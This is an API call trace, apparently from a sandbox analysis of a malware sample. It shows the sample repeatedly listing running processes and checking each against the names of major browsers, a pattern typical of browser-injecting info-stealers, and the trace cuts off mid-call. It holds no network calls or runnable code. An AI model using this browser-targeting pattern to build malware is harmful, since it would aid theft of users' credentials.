[0260.214] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0260.214] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.214] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0260.214] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0260.214] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0260.214] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0260.214] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0260.214] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.214] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.215] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0260.215] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0260.215] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0260.215] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0260.215] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.215] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0260.215] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0260.215] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0260.215] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0260.215] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0260.216] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.216] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.216] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0260.216] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0260.216] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0260.216] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0260.216] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.216] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0260.217] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0260.217] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0260.217] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0260.217] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0260.217] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.217] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.217] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0260.217] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0260.217] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0260.217] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0260.217] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0260.217] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0260.218] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0260.218] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0260.218] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0260.218] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0260.218] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.218] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.218] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0260.218] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0260.218] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0260.218] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0260.219] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0260.219] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.219] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0260.219] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0260.219] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0260.219] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0260.219] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0260.219] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.220] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0260.220] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0260.220] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0260.220] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0260.220] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0260.220] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.220] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0260.220] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0260.220] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0260.220] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0260.220] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0260.220] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0260.221] CloseHandle (hObject=0xe8) returned 1 [0260.221] Sleep (dwMilliseconds=0x3e8) [0261.254] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0261.255] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.256] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0261.256] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0261.256] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0261.256] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0261.256] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0261.256] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0261.256] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0261.256] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0261.256] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0261.256] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0261.256] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0261.256] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0261.257] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0261.257] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0261.257] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0261.257] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0261.257] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.257] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0261.258] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0261.258] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0261.258] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0261.258] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0261.258] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.258] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0261.258] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0261.258] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0261.258] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0261.258] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0261.258] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.258] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0261.259] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0261.259] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0261.259] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0261.259] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0261.259] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.259] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0261.259] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0261.259] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0261.259] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0261.259] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0261.259] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.259] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0261.260] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0261.260] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0261.260] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0261.260] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0261.260] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.260] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0261.260] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0261.260] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0261.260] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0261.260] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0261.260] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.261] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0261.261] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0261.261] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0261.261] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0261.261] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0261.261] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.261] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.262] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0261.262] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0261.262] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0261.262] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0261.262] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.262] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.262] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0261.262] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0261.262] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0261.262] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0261.262] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.262] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.263] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0261.263] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0261.263] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0261.263] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0261.263] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.263] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.263] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0261.263] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0261.263] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0261.263] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0261.263] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.263] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.264] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0261.264] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0261.264] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0261.264] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0261.264] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.264] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0261.264] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0261.264] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0261.264] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0261.264] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0261.265] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.265] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.265] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0261.265] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0261.265] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0261.265] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0261.265] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.265] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.266] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0261.266] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0261.266] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0261.266] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0261.266] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.266] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0261.266] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0261.266] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0261.266] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0261.266] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0261.266] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.266] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0261.267] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0261.267] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0261.267] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0261.267] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0261.267] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.267] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0261.267] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0261.267] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0261.267] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0261.267] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0261.267] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.267] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.268] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0261.268] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0261.268] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0261.268] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0261.268] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.268] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0261.268] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0261.269] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0261.269] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0261.269] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0261.269] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.269] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0261.269] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0261.269] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0261.269] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0261.269] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0261.269] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.269] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0261.270] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0261.270] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0261.270] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0261.270] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0261.270] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.270] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: 